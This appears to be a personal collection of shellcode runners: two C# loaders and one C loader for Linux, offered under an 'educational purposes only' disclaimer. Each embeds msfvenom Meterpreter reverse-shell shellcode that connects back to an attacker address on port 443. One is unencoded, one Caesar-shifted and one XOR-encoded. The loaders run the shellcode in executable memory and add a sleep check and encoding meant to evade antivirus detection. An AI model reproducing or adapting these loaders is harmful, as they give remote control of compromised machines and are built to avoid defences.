All exploits are written my myself and are for educational purposes only, i would not be liable for any misuse!

###CUSTOM SHELLCODE RUNNER

this can be modified to use uncommon window32 API to replace wel known API’s like VirtualAlloc and CreateThread



using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class MyProgram
    {
        [DllImport("kernel32")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32", CharSet = CharSet.Ansi)]
        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
        IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        
        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        static void Main(string[] args)
        {
        // sleep delay to bypass some heuritics detection
		    DateTime t1 = DateTime.Now;
		    Sleep(2000);
		    double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
		    if (t2 < 1.5)
		    {
		        return;
		    }

        
        // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.66 LPORT=443 -f csharp  [unencoded]

            byte[] buf = new byte[679] {
            0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
            0x51,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x56,0x48,0x8b,0x52,0x18,0x48,
            0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,
            0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
            0x01,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,
            0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
            0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b,
            0x40,0x20,0x50,0x49,0x01,0xd0,0x8b,0x48,0x18,0xe3,0x56,0x48,0xff,0xc9,0x4d,
            0x31,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
            0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
            0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
            0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
            0x48,0x01,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
            0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
            0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
            0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
            0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
            0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
            0xe8,0x0e,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x34,0x39,
            0x2e,0x36,0x36,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x01,0x00,0x00,
            0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,
            0x00,0x00,0x00,0xff,0xd5,0xe8,0x7e,0x00,0x00,0x00,0x2f,0x4b,0x65,0x70,0x39,
            0x73,0x53,0x2d,0x50,0x45,0x56,0x51,0x66,0x2d,0x78,0x37,0x35,0x66,0x65,0x30,
            0x7a,0x75,0x51,0x55,0x4e,0x43,0x6e,0x52,0x35,0x32,0x79,0x48,0x54,0x57,0x4d,
            0x50,0x65,0x51,0x61,0x33,0x69,0x62,0x66,0x35,0x4f,0x4f,0x57,0x52,0x79,0x56,
            0x7a,0x38,0x78,0x73,0x65,0x65,0x53,0x74,0x46,0x45,0x33,0x46,0x36,0x68,0x73,
            0x6a,0x54,0x5a,0x44,0x6e,0x61,0x4c,0x51,0x56,0x51,0x4d,0x5a,0x71,0x6f,0x41,
            0x77,0x6d,0x69,0x33,0x39,0x6b,0x41,0x43,0x74,0x69,0x30,0x45,0x6b,0x6c,0x61,
            0x42,0x6e,0x4e,0x61,0x6f,0x36,0x48,0x68,0x35,0x4e,0x55,0x79,0x72,0x53,0x62,
            0x41,0x4e,0x5a,0x6b,0x48,0x30,0x44,0x42,0x61,0x39,0x63,0x63,0x34,0x42,0x46,
            0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
            0x32,0xa8,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
            0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
            0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
            0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
            0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
            0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
            0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
            0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
            0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
            0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
            0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
            0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
            0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
            0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
            0xa2,0x56,0xff,0xd5 };

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

        }
    }
}


c# runner with time delay and encoded shellcode



using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace RevhellWIthEnc
{
    class Program
    {
        [DllImport("kernel32")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32", CharSet = CharSet.Ansi)]
        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
        IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        
        //Shelcode encoded with Ceaser Shift Cipher 
        {
            byte[] buf = new byte[803] {0xfe, 0x4a, 0x85, 0xe6, 0xf2, 0xea, 0xce, 0x02, 0x02, 0x02, 0x43, 0x53, 0x43, 0x52, 0x54, 0x53, 0x4a, 0x33, 0xd4, 0x67, 0x4a, 0x8d, 0x54, 0x62, 0x58, 0x4a, 0x8d, 0x54, 0x1a, 0x4a, 0x8d, 0x54, 0x22, 0x4a, 0x11, 0xb9, 0x4c, 0x4c, 0x4f, 0x33, 0xcb, 0x4a, 0x8d, 0x74, 0x52, 0x4a, 0x33, 0xc2, 0xae, 0x3e, 0x63, 0x7e, 0x04, 0x2e, 0x22, 0x43, 0xc3, 0xcb, 0x0f, 0x43, 0x03, 0xc3, 0xe4, 0xef, 0x54, 0x4a, 0x8d, 0x54, 0x22, 0x43, 0x53, 0x8d, 0x44, 0x3e, 0x4a, 0x03, 0xd2, 0x68, 0x83, 0x7a, 0x1a, 0x0d, 0x04, 0x11, 0x87, 0x74, 0x02, 0x02, 0x02, 0x8d, 0x82, 0x8a, 0x02, 0x02, 0x02, 0x4a, 0x87, 0xc2, 0x76, 0x69, 0x4a, 0x03, 0xd2, 0x52, 0x8d, 0x4a, 0x1a, 0x46, 0x8d, 0x42, 0x22, 0x4b, 0x03, 0xd2, 0xe5, 0x58, 0x4f, 0x33, 0xcb, 0x4a, 0x01, 0xcb, 0x43, 0x8d, 0x36, 0x8a, 0x4a, 0x03, 0xd8, 0x4a, 0x33, 0xc2, 0x43, 0xc3, 0xcb, 0x0f, 0xae, 0x43, 0x03, 0xc3, 0x3a, 0xe2, 0x77, 0xf3, 0x4e, 0x05, 0x4e, 0x26, 0x0a, 0x47, 0x3b, 0xd3, 0x77, 0xda, 0x5a, 0x46, 0x8d, 0x42, 0x26, 0x4b, 0x03, 0xd2, 0x68, 0x43, 0x8d, 0x0e, 0x4a, 0x46, 0x8d, 0x42, 0x1e, 0x4b, 0x03, 0xd2, 0x43, 0x8d, 0x06, 0x8a, 0x43, 0x5a, 0x4a, 0x03, 0xd2, 0x43, 0x5a, 0x60, 0x5b, 0x5c, 0x43, 0x5a, 0x43, 0x5b, 0x43, 0x5c, 0x4a, 0x85, 0xee, 0x22, 0x43, 0x54, 0x01, 0xe2, 0x5a, 0x43, 0x5b, 0x5c, 0x4a, 0x8d, 0x14, 0xeb, 0x4d, 0x01, 0x01, 0x01, 0x5f, 0x4a, 0x33, 0xdd, 0x55, 0x4b, 0xc0, 0x79, 0x6b, 0x70, 0x6b, 0x70, 0x67, 0x76, 0x02, 0x43, 0x58, 0x4a, 0x8b, 0xe3, 0x4b, 0xc9, 0xc4, 0x4e, 0x79, 0x28, 0x09, 0x01, 0xd7, 0x55, 0x55, 0x4a, 0x8b, 0xe3, 0x55, 0x5c, 0x4f, 0x33, 0xc2, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xbc, 0x3c, 0x58, 0x7b, 0xa9, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0x10, 0x02, 0x02, 0x02, 0x33, 0x3b, 0x34, 0x30, 0x33, 0x38, 0x3a, 0x30, 0x36, 0x3b, 0x30, 0x38, 0x38, 0x02, 0x5c, 0x4a, 0x8b, 0xc3, 0x4b, 0xc9, 0xc2, 0xbd, 0x03, 0x02, 0x02, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x6c, 0x05, 0x55, 0x4b, 0xbc, 0x59, 0x8b, 0xa1, 0xc8, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0xfc, 0x02, 0x02, 0x02, 0x31, 0x4b, 0x47, 0x76, 0x76, 0x49, 0x54, 0x58, 0x39, 0x58, 0x51, 0x2f, 0x39, 0x56, 0x4e, 0x72, 0x51, 0x34, 0x58, 0x4d, 0x70, 0x5b, 0x43, 0x50, 0x65, 0x2f, 0x49, 0x45, 0x69, 0x68, 0x72, 0x77, 0x72, 0x5a, 0x68, 0x59, 0x56, 0x5a, 0x74, 0x6b, 0x45, 0x56, 0x75, 0x78, 0x73, 0x4c, 0x7b, 0x32, 0x59, 0x63, 0x54, 0x6a, 0x79, 0x4f, 0x6c, 0x45, 0x2f, 0x50, 0x7a, 0x7b, 0x51, 0x70, 0x6b, 0x64, 0x64, 0x64, 0x61, 0x76, 0x78, 0x34, 0x67, 0x48, 0x6f, 0x4d, 0x69, 0x76, 0x2f, 0x74, 0x4c, 0x6a, 0x72, 0x4b, 0x39, 0x54, 0x64, 0x4b, 0x4b, 0x51, 0x33, 0x59, 0x78, 0x65, 0x68, 0x43, 0x67, 0x44, 0x5c, 0x37, 0x43, 0x77, 0x39, 0x6b, 0x51, 0x63, 0x54, 0x47, 0x3a, 0x45, 0x4f, 0x70, 0x6d, 0x45, 0x75, 0x61, 0x7a, 0x64, 0x59, 0x4d, 0x78, 0x7b, 0x59, 0x37, 0x55, 0x69, 0x67, 0x6a, 0x58, 0x37, 0x63, 0x61, 0x66, 0x4f, 0x37, 0x4d, 0x48, 0x7b, 0x43, 0x43, 0x49, 0x43, 0x61, 0x70, 0x5b, 0x35, 0x56, 0x52, 0x32, 0x4e, 0x79, 0x6b, 0x6c, 0x64, 0x59, 0x75, 0x66, 0x7b, 0x45, 0x71, 0x57, 0x43, 0x64, 0x3a, 0x5a, 0x37, 0x37, 0x7b, 0x38, 0x7c, 0x4e, 0x2f, 0x48, 0x6f, 0x3a, 0x59, 0x70, 0x44, 0x63, 0x6a, 0x4d, 0x38, 0x6a, 0x32, 0x54, 0x32, 0x78, 0x37, 0x4e, 0x61, 0x69, 0x57, 0x77, 0x7c, 0x71, 0x33, 0x37, 0x49, 0x5b, 0x49, 0x69, 0x71, 0x49, 0x6d, 0x6d, 0x67, 0x6d, 0x39, 0x37, 0x69, 0x55, 0x38, 0x5b, 0x66, 0x76, 0x39, 0x4f, 0x67, 0x4b, 0x59, 0x57, 0x59, 0x61, 0x79, 0x6c, 0x54, 0x6a, 0x7c, 0x6e, 0x71, 0x50, 0x4f, 0x35, 0x57, 0x72, 0x39, 0x55, 0x72, 0x3b, 0x66, 0x37, 0x46, 0x69, 0x54, 0x7c, 0x5b, 0x7b, 0x77, 0x76, 0x3a, 0x35, 0x02, 0x4a, 0x8b, 0xc3, 0x55, 0x5c, 0x43, 0x5a, 0x4f, 0x33, 0xcb, 0x55, 0x4a, 0xba, 0x02, 0x34, 0xaa, 0x86, 0x02, 0x02, 0x02, 0x02, 0x52, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0xed, 0x57, 0x30, 0x3d, 0x01, 0xd7, 0x4a, 0x8b, 0xc8, 0x6c, 0x0c, 0x61, 0x4a, 0x8b, 0xf3, 0x6c, 0x21, 0x5c, 0x54, 0x6a, 0x82, 0x35, 0x02, 0x02, 0x4b, 0x8b, 0xe2, 0x6c, 0x06, 0x43, 0x5b, 0x4b, 0xbc, 0x77, 0x48, 0xa0, 0x88, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4f, 0x33, 0xc2, 0x55, 0x5c, 0x4a, 0x8b, 0xf3, 0x4f, 0x33, 0xcb, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0x2f, 0x08, 0x1a, 0x7d, 0x01, 0xd7, 0x87, 0xc2, 0x77, 0x21, 0x4a, 0xc9, 0xc3, 0x8a, 0x15, 0x02, 0x02, 0x4b, 0xbc, 0x46, 0xf2, 0x37, 0xe2, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x01, 0xd1, 0x76, 0x04, 0xed, 0xac, 0xea, 0x57, 0x02, 0x02, 0x02, 0x55, 0x5b, 0x6c, 0x42, 0x5c, 0x4b, 0x8b, 0xd3, 0xc3, 0xe4, 0x12, 0x4b, 0xc9, 0xc2, 0x02, 0x12, 0x02, 0x02, 0x4b, 0xbc, 0x5a, 0xa6, 0x55, 0xe7, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x95, 0x55, 0x55, 0x4a, 0x8b, 0xe9, 0x4a, 0x8b, 0xf3, 0x4a, 0x8b, 0xdc, 0x4b, 0xc9, 0xc2, 0x02, 0x22, 0x02, 0x02, 0x4b, 0x8b, 0xfb, 0x4b, 0xbc, 0x14, 0x98, 0x8b, 0xe4, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x85, 0xc6, 0x22, 0x87, 0xc2, 0x76, 0xb4, 0x68, 0x8d, 0x09, 0x4a, 0x03, 0xc5, 0x87, 0xc2, 0x77, 0xd4, 0x5a, 0xc5, 0x5a, 0x6c, 0x02, 0x5b, 0x4b, 0xc9, 0xc4, 0xf2, 0xb7, 0xa4, 0x58, 0x01, 0xd7 };


            //Console.WriteLine(buf.Length);
            //Console.ReadLine();
            //decryption routine
            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
            }
            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);

            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

        }
    }
}


C SHELLCODE RUNNER WITH FORK FUNCTION

#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/mman.h>
#include <dlfcn.h>


//msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.49.164 LPORT=443 -f c | then use the XOR helper to encoded it with key "112"

unsigned char buf[] = "\x38\x41\x8F\x1A\x79\x28\xE9\xC6\x60\x38\xF9\xA6\x3D\x41\xB9\x1A\x52\x31\x2A\xC2\x77\x7F\x75\x38\xF5\xB0\x08\x21\x1A\x7A\x31\x29\x20\x1A\x59\x28\xE9\x1A\x72\x2F\x1A\x71\x2E\x7F\x75\x38\xF5\xB0\x08\x4B\x38\xE7\x38\xC9\x72\x70\x71\xCB\xB0\xD8\x41\xD4\x21\x38\xF9\x96\x1A\x60\x2A\x1A\x5A\x28\x7F\x75\x29\x38\xF5\xB0\x09\x55\x39\x8F\xB9\x04\x68\x27\x1A\x53\x28\x1A\x70\x1A\x75\x38\xF9\x97\x38\x41\x86\x7F\x75\x29\x29\x2F\x38\xF5\xB0\x09\xB7\x1A\x4C\x28\x1A\x71\x2F\x7F\x75\x2E\x1A\x0E\x2A\x7F\x75\x38\xF5\xB0\x08\x9D\x8F\x96\x70";

int main() {
    printf("I Love Programming.");
    

    int key = 112;
    int buf_len = (int) sizeof(buf);

    //Decode Routine
    for (int i = 0; i < buf_len; i++)
    {
        buf[i] = buf[i] ^ key;
        
    }
    // Fork a new thread based on the current one
    if (fork() == 0)
    {
        // Execute shellcode in the new thread
        intptr_t pagesize = sysconf(_SC_PAGESIZE);

        // Make memory executable (required in libs)
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
            // Handle error
            perror("mprotect");
            return -1;
        }

        // Cast and execute
        int (*ret)() = (int(*)())buf;
        ret();
    }

}